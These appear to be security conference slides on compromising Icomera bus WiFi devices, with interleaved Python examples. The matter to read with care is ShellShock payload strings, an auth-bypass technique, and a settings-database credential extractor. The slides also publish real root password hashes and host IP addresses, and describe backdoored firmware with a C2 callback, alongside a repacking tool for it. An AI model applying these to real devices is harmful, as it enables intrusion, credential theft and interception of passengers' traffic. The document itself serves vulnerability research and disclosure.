Shell on Wheels: Exploitation of endpoint wireless devices for mostly fun and possibly profit
Darren Martyn
Xiphos [email protected]
whoami
• Darren Martyn / @infodox (twitter)
• Penetration Tester & Researcher @ Xiphos Research Ltd
• Forensics & Chemistry Student @ GMIT
what?
• Today we will look at owning those “free WiFi” access points on just about every bus ever.
• Sorry guys. Not Charlie Miller style bus owning here. Nothing explodes/catches fire/crashes.
• Still, will make bus rides a lot more fun!
Let’s explore the magic box!
• i486 Embedded Processor (so, x86)
• One or more (usually two) data cards for cell connectivity
• WiFi, Ethernet, GPS, serial
• Unfortunately, I was unable to acquire my own magic box
But firmware is good too!
• Via googling, came across a random FTP server containing 108 firmware images for these devices (courtesy of an engineer)
• Judicious application of wget. (anonymous login FTW)
• Now we have firmware images
find . -name "vuln"
• Took a fairly blind approach to finding vulns
• “Grep and gripe” kind of things
• First off, looked at the web interface of device
Some numbers
• All 108 were vulnerable to ShellShock
• All 108 had the same shitty CGI script
• 106 used thttpd, running as root
• 2 ran lighttpd. Also as root
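The figures above come from grepping the firmware, not from probing devices. For anyone watching the wire instead, here is a small request-side check for the ShellShock trigger, as an added example that is not part of the talk. It rests on two facts: a CGI server copies each request header verbatim into an HTTP_<NAME> environment variable before running the script, and bash 4.3 and earlier imported any variable whose value began with the literal prefix "() {" as a function and executed whatever followed the closing brace. The sample requests are constructed; /cgi-bin/status.cgi is a placeholder path, not the CGI script from the slides.

```python
"""Flag HTTP requests that carry a ShellShock (CVE-2014-6271) trigger.

Added detection example, not from the talk. The check is simply: does any
header value start with the prefix a vulnerable bash parsed as a function?
"""
import re

# Vulnerable bash matched the four literal characters "() {". The regex is
# slightly looser (optional whitespace) so mangled variants are caught too.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def parse_headers(raw):
    """Minimal HTTP/1.x request parser: ordered list of (name, value) pairs
    from the head of the request, request line skipped."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def cgi_var(header_name):
    """Header name -> CGI environment variable, e.g. User-Agent -> HTTP_USER_AGENT.
    (CGI special-cases Content-Type/Content-Length; that is ignored here.)"""
    return "HTTP_" + header_name.upper().replace("-", "_")


def shellshock_hits(raw):
    """Return [(env_var, value)] for every header a vulnerable bash would
    import as a function; an empty list means no trigger present."""
    return [(cgi_var(name), value) for name, value in parse_headers(raw)
            if SHELLSHOCK_RE.match(value)]


# Constructed sample requests (placeholder path, placeholder host).
BENIGN = ("GET /cgi-bin/status.cgi?page=1 HTTP/1.1\r\n"
          "Host: 10.0.0.1\r\n"
          "User-Agent: Mozilla/5.0 (X11; Linux i686)\r\n\r\n")
ATTACK = ("GET /cgi-bin/status.cgi HTTP/1.1\r\n"
          "Host: 10.0.0.1\r\n"
          "User-Agent: () { :; }; echo vulnerable\r\n"
          "Referer: () { :;}; id\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("attack", ATTACK)):
        print(label, shellshock_hits(req))
```

Any header name works as a carrier, which is why the check walks every header rather than only User-Agent; a thttpd or lighttpd box running the CGI as root turns one matching header into a root shell.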
Going beyond Rootshells
• So we can execute code as root
• Leverage this to bypass auth and get at the web interface?
• Dump settings from the device?
• Persistent (firmware) rootkits?
Bypassing Auth
• Uses .htpasswd for auth
• Wrote a simple script to enable/disable auth
• Simply mv the .htpasswd to disable, mv back to re-enable
Dumping Settings
• With Auth bypassed, we can wget “moovbox.settings” from the device
• Sqlite3 database, contains passwords and such
• The Sqlite database was a mess, so I wrote a parser to dump the goods from it
Remote Settings Grabber
• Just for shits and giggles, I wrote an auto settings downloader
• Disable auth on device
• Dump database from device (save as md5sum of file)
• Re-enable auth on device
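The settings parser and the "save as md5sum" step of the grabber, reconstructed as an added example (this is not the author's script). The schema of moovbox.settings is not documented on the slides, so the dumper walks sqlite_master instead of assuming table names, and flags any column whose name looks credential-like. The sample database built below is constructed for the example; its tables, columns and values are invented.

```python
"""Dump a device settings SQLite database, pull out credential-looking
values, and name the saved copy by its MD5 sum (so identical dumps from many
devices collapse to one file).

Added example, not the parser from the talk. Sample schema is invented.
"""
import hashlib
import os
import sqlite3
import tempfile

# Column-name fragments that usually mean "worth reading" in a settings DB.
CREDENTIAL_HINTS = ("pass", "pwd", "secret", "psk", "key", "token", "community")


def dump_settings(db_path):
    """Return {table: (column_names, rows)} for every user table, discovered
    via sqlite_master because the real layout is unknown."""
    con = sqlite3.connect(db_path)
    try:
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table' "
            "AND name NOT LIKE 'sqlite_%'")]
        result = {}
        for table in tables:
            # Names come from sqlite_master; quote them anyway.
            cur = con.execute('SELECT * FROM "%s"' % table.replace('"', '""'))
            cols = [d[0] for d in cur.description]
            result[table] = (cols, cur.fetchall())
        return result
    finally:
        con.close()


def find_credentials(dump):
    """Return [(table, column, value)] for non-empty cells in columns whose
    name contains a credential hint."""
    hits = []
    for table, (cols, rows) in dump.items():
        for idx, col in enumerate(cols):
            if not any(h in col.lower() for h in CREDENTIAL_HINTS):
                continue
            for row in rows:
                if row[idx] not in (None, ""):
                    hits.append((table, col, row[idx]))
    return hits


def md5_name(path):
    """Hex MD5 of the file contents, used as the archive file name."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_sample_db(path):
    """Constructed sample in the spirit of moovbox.settings (invented schema)."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE wifi (ssid TEXT, wpa_psk TEXT, channel INTEGER);
        CREATE TABLE admin (username TEXT, password TEXT);
        CREATE TABLE gps (lat REAL, lon REAL);
        INSERT INTO wifi VALUES ('FreeBusWiFi', '', 6);
        INSERT INTO wifi VALUES ('MaintenanceAP', 'example-psk-1234', 11);
        INSERT INTO admin VALUES ('admin', 'example-admin-pw');
        INSERT INTO gps VALUES (53.27, -9.05);
    """)
    con.commit()
    con.close()


def demo():
    """Create the sample DB in a temp dir, dump it, return (hits, md5 name)."""
    db_path = os.path.join(tempfile.mkdtemp(), "moovbox.settings")
    build_sample_db(db_path)
    return find_credentials(dump_settings(db_path)), md5_name(db_path)


if __name__ == "__main__":
    hits, name = demo()
    for table, col, val in hits:
        print("%s.%s = %r" % (table, col, val))
    print("saved as", name)
```

Point the dumper at the file fetched with wget once auth is disabled; the MD5 file name is what lets the auto-grabber run against many devices without keeping duplicate copies.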
Further firmware analysis
• Let's look for more fun stuff in this firmware
• First off, we analyse the passwd files
• 4 unique hashes
The Hashes
• I have yet to crack these. People have been trying and failing for about a month. Can you succeed?
root:$1$5jjAfVIS$dIG6AvGNwq8EENjTHnfpK/
root:$1$jb.3W.1D$8FeBW.T/x2wwJVB.lp.gv1
root:$1$bw7WuzHj$aU6V7omf9zBWA2sEaJv9p1
root:$6$W74jOIhT$QaYoDDN.N1SRgyG5ALymJHcYc9TmXKcITXyCstGDdK9cXOssLOTMQPl2uRm.wsNZ7oE5byOOrdNlvNxyguqVs/
SSH Keys
• Protip: Hardcoded SSH Keys Suck
• They all have /etc/ssh/ keys. RSA and DSA
• They also have the same /etc/ssh_key privkey, which is a bit unusual...
/etc/ssh_key
• Now, this is an odd one. It matches exactly two boxes in the wild – both hosts in Germany
• As to wtf these are, I have no idea
• If anyone can figure it out, it would be great ;)
• 89.110.151.186 & 89.110.148.26 (who is this?)
Let’s go after SSL keys…
• OpenVPN Keys: find . -name "*.key" (108)
> 2e465be3c06ea7db968347aaa3df7d37
> All identical
• SSL Keys: find . -name "*.pem" (973)
> Also the same…
SSL Keys
• 6 of them on each image. All identical across images:
> 7135ad5b7fd5fb2eb23f8dfecf74919d
> cb5199178e4649461928356c7cbdae74
> de2c6949bd1bca55c20d9610510a08d1
> 905a7590ee039a788a08d4dfd15d2582
> a926c2beaa439f37bc62a5678a4e5906
> 35a569e0e768495554c4cbddd787f9e4
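Both the "4 unique hashes" count and the identical-key findings above are the same analysis: hash every secret in every extracted image and see how many images share it. Here is that analysis as one added script (not the author's tooling). It assumes one extracted root filesystem per image under a directory such as images/<image-name>/, treats *.key, *.pem and the SSH key files as key material, and parses root hashes out of passwd/shadow. The three fake images it builds are constructed; the key bodies are placeholders, and the two hashes are the ones quoted on the slides, used only as sample input.

```python
"""Group private keys and password hashes across extracted firmware images.

Added example, not the author's tooling. Layout assumed: ROOT/<image>/...
holds one extracted root filesystem per image. Anything found in more than
one image is a fleet-wide shared secret.
"""
import hashlib
import os
import re
import tempfile
from collections import defaultdict

KEY_SUFFIXES = (".key", ".pem")                      # OpenVPN / SSL material
KEY_NAMES = ("ssh_host_rsa_key", "ssh_host_dsa_key", "ssh_key")
HASH_RE = re.compile(r"^([^:]+):(\$(?:1|5|6)\$[^:\s]+)")  # user:$id$salt$hash
HASH_ALGOS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}


def _md5(data):
    return hashlib.md5(data).hexdigest()


def collect(root):
    """Index key files by content digest and passwd/shadow hashes by hash
    string; each entry records the set of images it was seen in."""
    keys = defaultdict(lambda: {"path": None, "images": set()})
    hashes = defaultdict(lambda: {"user": None, "images": set()})
    for image in sorted(os.listdir(root)):
        image_dir = os.path.join(root, image)
        if not os.path.isdir(image_dir):
            continue
        for dirpath, _, files in os.walk(image_dir):
            for name in files:
                full = os.path.join(dirpath, name)
                with open(full, "rb") as f:
                    data = f.read()
                if name.endswith(KEY_SUFFIXES) or name in KEY_NAMES:
                    entry = keys[_md5(data)]
                    entry["path"] = os.path.relpath(full, image_dir)
                    entry["images"].add(image)
                elif name in ("passwd", "shadow"):
                    for line in data.decode("utf-8", "replace").splitlines():
                        m = HASH_RE.match(line)
                        if m:
                            entry = hashes[m.group(2)]
                            entry["user"] = m.group(1)
                            entry["images"].add(image)
    return keys, hashes


def shared(keys, hashes, min_images=2):
    """Secrets present in at least min_images images:
    ({digest: (path, n_images)}, {hash: (user, algorithm, n_images)})."""
    shared_keys = {d: (e["path"], len(e["images"]))
                   for d, e in keys.items() if len(e["images"]) >= min_images}
    shared_hashes = {h: (e["user"], HASH_ALGOS.get(h.split("$")[1], "?"),
                         len(e["images"]))
                     for h, e in hashes.items() if len(e["images"]) >= min_images}
    return shared_keys, shared_hashes


# Constructed sample data: placeholder key bodies, hashes copied from the slides.
OPENVPN_KEY = b"-----BEGIN PRIVATE KEY-----\nconstructed-openvpn-key\n-----END PRIVATE KEY-----\n"
OTHER_KEY = b"-----BEGIN PRIVATE KEY-----\nconstructed-different-key\n-----END PRIVATE KEY-----\n"
SSH_KEY = b"-----BEGIN RSA PRIVATE KEY-----\nconstructed-ssh-key\n-----END RSA PRIVATE KEY-----\n"
HASH_MD5CRYPT = "$1$5jjAfVIS$dIG6AvGNwq8EENjTHnfpK/"
HASH_SHA512CRYPT = ("$6$W74jOIhT$QaYoDDN.N1SRgyG5ALymJHcYc9TmXKcITXyCstG"
                    "DdK9cXOssLOTMQPl2uRm.wsNZ7oE5byOOrdNlvNxyguqVs/")


def build_sample(root):
    """Three fake extracted images: a and b share everything, c differs."""
    passwd = "root:%s:0:0:root:/root:/bin/sh\n"
    layout = {
        "image_a": {"etc/openvpn/client.key": OPENVPN_KEY, "etc/ssh_key": SSH_KEY,
                    "etc/passwd": (passwd % HASH_MD5CRYPT).encode()},
        "image_b": {"etc/openvpn/client.key": OPENVPN_KEY, "etc/ssh_key": SSH_KEY,
                    "etc/passwd": (passwd % HASH_MD5CRYPT).encode()},
        "image_c": {"etc/openvpn/client.key": OTHER_KEY, "etc/ssh_key": SSH_KEY,
                    "etc/shadow": ("root:%s:16000:0:99999:7:::\n" % HASH_SHA512CRYPT).encode()},
    }
    for image, files in layout.items():
        for rel, content in files.items():
            full = os.path.join(root, image, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(content)


def demo():
    """Build the sample tree in a temp dir and return the shared secrets."""
    root = tempfile.mkdtemp()
    build_sample(root)
    return shared(*collect(root))


if __name__ == "__main__":
    keys, hashes = demo()
    for digest, (path, n) in keys.items():
        print("%s  %s  shared by %d images" % (digest, path, n))
    for h, (user, algo, n) in hashes.items():
        print("%s  %s (%s)  shared by %d images" % (user, h, algo, n))
```

Run against the 108 real images, the "shared by N" column is the whole story: a count of 108 on an OpenVPN key or SSL key means one compromised device exposes every device, and a shared root hash means one cracked password does the same.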
God damn it – all the same?!?!
• These are also good for remote fingerprinting
• And probably traffic interception...
• “You guys are bad at this!” is the only apt response to the vendor
Owning the Client
• Interestingly, these devices do intercept HTTP(s) traffic
• This is for site blocking and to inject banner ads
• Seems to use Privoxy and some scripts to do this
(More) Owning the Client
• Devices all have this wonderful traffic interception suite
• Modify existing JS injector to inject BeEF, perhaps?
• Not tested for obvious reasons, but doable
(Yet More) Owning the Client
• These devices have libpcap installed
• Dropping a working packet sniffer is easy
• Sniff cleartext credentials over the wire... All their traffic is going through you!
Remember I said SSL interception?
• Some of these devices observed in the wild tamper with HTTPS traffic
• Self signed keys observed with SSL'd sites, etc.
• Seemingly generated from the keys stored on device
• Use your imagination
So what about rootkits?
• This is where it gets really fun. And fairly untested
• While attempting to repack firmware, I noticed there were two variants of image in there
• Variant 1 was just a raw CRAMFS image
• Variant 2 was [header][CRAMFS image]
Challenges
• So the raw CRAMFS one, we can just repack and upload
• The other one... I had to try to make sense of the header
• This is untested on a live device, so don't try this unless you are willing to break stuff
Creating ‘doored firmware
• Add backdoors to extracted CramFS filesystem
• Repackage CramFS filesystem
• If needed, append the weird header so that CramFS magic starts at offset 0x64
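The two layouts, and the re-wrapping step, as an added example (not the author's repacking tool). The only facts it takes from the slides are that variant 1 is a bare CramFS image and variant 2 is a header followed by the CramFS image with the CramFS magic at offset 0x64. The header is treated as opaque bytes and copied back unchanged; nothing is assumed about what it contains or whether the device validates it. The CramFS superblock layout used for detection (magic 0x28cd3d45 at offset 0, the "Compressed ROMFS" signature at offset 16) is the standard one from the Linux cramfs format, and the stand-in image built for the demo is constructed and not mountable.

```python
"""Tell the two firmware layouts apart and re-wrap a rebuilt CramFS image.

Added example, not the author's tool. Variant 1: [CramFS]. Variant 2:
[0x64-byte opaque header][CramFS]. The header is preserved verbatim.
"""
import struct

CRAMFS_MAGIC = 0x28CD3D45              # u32 at superblock offset 0, little-endian
CRAMFS_SIGNATURE = b"Compressed ROMFS"  # 16 bytes at superblock offset 16
HEADER_LEN = 0x64                       # variant 2: superblock starts here


def is_cramfs_at(data, offset):
    """True if a CramFS superblock (magic + signature) begins at offset."""
    if len(data) < offset + 32:
        return False
    magic, = struct.unpack_from("<I", data, offset)
    return magic == CRAMFS_MAGIC and data[offset + 16:offset + 32] == CRAMFS_SIGNATURE


def layout(data):
    """'raw' (variant 1), 'headered' (variant 2) or None if neither."""
    if is_cramfs_at(data, 0):
        return "raw"
    if is_cramfs_at(data, HEADER_LEN):
        return "headered"
    return None


def split_image(data):
    """Return (header, cramfs); header is b"" for a raw image."""
    kind = layout(data)
    if kind == "raw":
        return b"", data
    if kind == "headered":
        return data[:HEADER_LEN], data[HEADER_LEN:]
    raise ValueError("no CramFS superblock at offset 0 or 0x%x" % HEADER_LEN)


def rewrap(header, new_cramfs):
    """Prepend the saved header to a rebuilt CramFS image (mkcramfs output).
    For a raw image the header is empty and this is a no-op."""
    if not is_cramfs_at(new_cramfs, 0):
        raise ValueError("rebuilt image does not start with a CramFS superblock")
    return header + new_cramfs


def fake_cramfs(size=4096):
    """Constructed stand-in for mkcramfs output: a superblock prefix
    (magic, size, flags, future, signature) plus zero padding. Not mountable."""
    sb = struct.pack("<IIII", CRAMFS_MAGIC, size, 0, 0) + CRAMFS_SIGNATURE
    return sb + b"\0" * (size - len(sb))


def demo():
    """Split both variants, swap in a 'modified' filesystem, re-wrap it.
    Returns (raw header len, variant-2 header len, magic at 0x64 after
    re-wrap, re-wrapped length)."""
    raw = fake_cramfs()
    headered = b"\x01" * HEADER_LEN + fake_cramfs()   # constructed opaque header
    h1, _ = split_image(raw)
    h2, _ = split_image(headered)
    repacked = rewrap(h2, fake_cramfs(8192))
    return len(h1), len(h2), is_cramfs_at(repacked, HEADER_LEN), len(repacked)


if __name__ == "__main__":
    print(demo())
```

Workflow: split_image on the vendor file, extract and modify the CramFS part, rebuild it with mkcramfs, then rewrap with the header that was split off. If the header carries a length or checksum over the filesystem (unknown from the slides), the re-wrapped image will be rejected, which is the untested part the slide warns about.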
Suggested Payloads for Modified Firmware
• Script Injector as mentioned previously using already existing code on the device!
• Traffic sniffer à la Linux\Flasher.A rootkit
• Remote shell/file xfer – “tshd” or similar with an hourly callback to C2?
Some Conclusions
• These devices have no security
• If you use free WiFi on public transport, expect to be owned. (well, that's to be expected?)
• If you are a vendor of such devices, start taking security bloody seriously
Afterthoughts: Concerning Disclosure
• Tried emailing Icomera, did not receive a response
• Made repeated attempts with no success; normally when I try to alert vendors about stuff they get annoying and irritable
Afterthoughts: Concerning Patching
• Icomera claim on their blog to have patched the ShellShock exploit
• However, as it's up to end users to patch their boxen (no auto updater), this is kinda useless
• All the devices I see ITW are vulnerable still
• Raises concerns over Internet of Junk and updates
Thanks
• f1nux and the BsidesHN crew for making this event happen <3
• Co-workers for letting me off to do science and supporting it
• Various friends (you know who you are) for helping out
• Icomera, for making such a wonderful product I have something to talk about